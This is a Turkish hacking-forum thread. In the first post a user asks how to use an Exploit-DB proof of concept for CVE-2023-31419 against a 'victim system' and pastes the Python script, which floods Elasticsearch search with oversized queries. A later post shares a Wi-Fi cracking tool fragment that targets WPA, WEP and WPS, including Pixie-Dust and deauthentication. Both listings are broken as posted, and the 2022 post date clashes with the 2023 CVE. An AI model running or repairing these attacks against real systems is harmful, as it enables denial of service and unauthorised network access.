Bulduğum Exploit'i Nasıl Çalıştıracağım?


7 Ağu 2022
Merhaba THT ailesi, dün makinede var olan bir açık buldum ve bunun için Exploit-DB'yi kullanarak bir exploit buldum.

Exploit şu: CVE-2023-31419

Fakat bu kodun kurban sisteme karşı nasıl çalıştırılacağını çözemedim. Video eğitim veya konu varsa yardım edebilir misiniz?

# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: Elasticsearch Platform — Find real-time answers at scale
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: GitHub - sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419: Elasticsearch Stack Overflow Vulnerability

import requests
import random
import string

# Proof-of-concept request loop for the issue named in the header comments
# (CVE-2023-31419, described in the Ref line as an Elasticsearch stack overflow).
# NOTE(review): the listing is incomplete as posted: indentation is lost and some
# lines appear to be missing, so it is not valid Python in this form.
# Defender view: every iteration sends one `_search` request whose `message` value
# is a 5000-character random string repeated 9000 times (about 45 million
# characters) followed by the fixed `payload` suffix. Repeated, very large
# `_search` bodies from a single client are the signal to alert on, and a request
# size cap in front of the cluster bounds them. Whether a given cluster is
# affected depends on its version; check the vendor advisory for this CVE.
es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL
# '*' is interpolated into the request path below, so the search addresses every index.
index_name = '*'

# 10000 repetitions of "/*", then a single backslash, then 999 single quotes.
payload = "/*" * 10000 + "\\" +"'" * 999

# Passed as `verify=` to requests.get: TLS certificate verification is switched off.
# With the plain-http URL above it has no effect.
verify_ssl = False

# Hard-coded credentials, sent as HTTP basic auth. 'changeme' is a placeholder value:
# a cluster that accepts it needs its password rotated regardless of this CVE.
username = 'elastic'
password = 'changeme'

auth = (username, password)

# Number of requests the loop sends.
num_queries = 100

for _ in range(num_queries):
# A fresh 5000-character string of letters, digits and '^' for each request.
symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
# Body of a `match` query on the `message` field; the value is the oversized string.
search_query = {
"query": {
"match": {
"message": (symbols * 9000) + payload

# Prints only a header line; the query body itself is not printed.
print(f"Query {_ + 1} - Search Query:")

search_endpoint = f'{es_url}/{index_name}/_search'
# GET with a JSON body; no timeout is set on the call.
response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

if response.status_code == 200:
search_results = response.json()

print(f"Query {_ + 1} - Response:")

total_hits = search_results['hits']['total']['value']
print(f"Query {_ + 1}: Total hits: {total_hits}")

for hit in search_results['hits']['hits']:
# source_data is assigned but never used afterwards.
source_data = hit['_source']
# No f-prefix on this string, so it prints the literal text "{search_results}".
print("Payload result: {search_results}")
# NOTE(review): presumably the non-200 branch of the status check above; the
# branch line itself is not in the post.
print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")


Kıdemli Üye
15 Mar 2022
Merhabalar, aşağıdaki konularda detaylı açıklamalar var; işine yarayacaktır. İyi forumlar.


Yeni üye
2 Mar 2024
Sayın hocalarım ve üstlerim, forumda yeniyim. Pydroid 3 için düzenlediğim kodlarda 358. satırda hata mevcut. Yardımcı olursanız mutlu olurum. Paylaşacağım kodların öncesinde ve sonrasında da kodlar mevcut.

# Fragment from the middle of an option-handling method. It uses `self`, but the
# enclosing `def` and the code before and after it are not part of the post.
# It copies parsed command-line options onto attributes of `self` and prints one
# status line per option. GR, W, G, O and R are defined elsewhere (presumably
# terminal colour codes), as is `set_encrypt`.
# NOTE(review): not valid Python as posted. Indentation is gone, and the
# `except ValueError:` / `except IndexError:` lines below have no visible `try:`
# in front of them. The SyntaxError quoted later in the thread ("expected 'except'
# or 'finally' block" at `if options.nodeauth:`) is what Python reports when a
# `try:` body ends without an except/finally at the same indentation level, so
# the try/except nesting and indentation around that line are what to check.
opt_parser = self.build_opt_parser()
options = opt_parser.parse_args()

# If any encryption filter was requested and none was set earlier, disable all
# three types first; the option checks below re-enable the requested ones.
if not set_encrypt and (options.wpa or options.wep or options.wps):
self.WPS_DISABLE = True
self.WPA_DISABLE = True
self.WEP_DISABLE = True
set_encrypt = True
if options.recrack:
print(GR + ' [+]' + W + ' including already cracked networks in targets.')
if options.wpa:
# NOTE(review): the two prints below look like alternatives (with and without
# the WPS option); the line separating them is not in the post.
if options.wps:
print(GR + ' [+]' + W + ' targeting ' + G + 'WPA' + W + ' encrypted networks.')
print(GR + ' [+]' + W + ' targeting ' + G + 'WPA' + W + ' encrypted networks (use ' + G + '-wps' + W + ' for WPS scan)')
self.WPA_DISABLE = False
if options.wep:
print(GR + ' [+]' + W + ' targeting ' + G + 'WEP' + W + ' encrypted networks')
self.WEP_DISABLE = False
if options.wps:
print(GR + ' [+]' + W + ' targeting ' + G + 'WPS-enabled' + W + ' networks.')
self.WPS_DISABLE = False
# The pixie option enables WPS handling, disables WEP and sets the PIXIE flag.
if options.pixie:
print(GR + ' [+]' + W + ' targeting ' + G + 'WPS-enabled' + W + ' networks.')
print(GR + ' [+]' + W + ' using only ' + G + 'WPS Pixie-Dust' + W + ' attack.')
self.WPS_DISABLE = False
self.WEP_DISABLE = True
self.PIXIE = True
if options.channel:
# int() raises ValueError for a non-numeric channel; the handler below reports it.
self.TARGET_CHANNEL = int(options.channel)
except ValueError:
print(O + ' [!]' + R + ' invalid channel: ' + O + options.channel + W)
except IndexError:
print(O + ' [!]' + R + ' no channel given!' + W)
print(GR + ' [+]' + W + ' channel set to %s' % (G + str(self.TARGET_CHANNEL) + W))
# The mac_anon option clears DO_NOT_CHANGE_MAC.
if options.mac_anon:
print(GR + ' [+]' + W + ' mac address anonymizing ' + G + 'enabled' + W)
print(O + ' not: only works if device is not already in monitor mode!' + W)
self.DO_NOT_CHANGE_MAC = False
if options.interface:
self.WIRELESS_IFACE = options.interface
print(GR + ' [+]' + W + ' set interface :%s' % (G + self.WIRELESS_IFACE + W))
if options.monitor_interface:
self.MONITOR_IFACE = options.monitor_interface
print(GR + ' [+]' + W + ' set interface already in monitor mode :%s' % (G + self.MONITOR_IFACE + W))
# The nodeauth option clears SEND_DEAUTHS. This is the statement the posted
# traceback points at (line 358 of the poster's file).
if options.nodeauth:
self.SEND_DEAUTHS = False
print(GR + ' [+]' + W + ' will not deauthenticate clients while scanning%s' % W)
if options.essid:
self.TARGET_ESSID = options.essid
except ValueError:
print(R + ' [!]' + O + ' no ESSID given!' + W)
print(GR + ' [+]' + W + ' targeting ESSID "%s"' % (G + self.TARGET_ESSID + W))
# The body of this branch is not included in the post.
if options.bssid:


Yeni üye
2 Mar 2024
Traceback (most recent call last):
File "/data/user/0/ru.iiec.pydroid3/files/accomp_files/iiec_run/iiec_run.py", line 31, in <module>
File "/data/user/0/ru.iiec.pydroid3/files/accomp_files/iiec_run/iiec_run.py", line 30, in start
exec(open(mainpyfile).read(), __main__.__dict__)
File "<string>", line 358
if options.nodeauth:
SyntaxError: expected 'except' or 'finally' block

[Program finished]

if options.nodeauth:

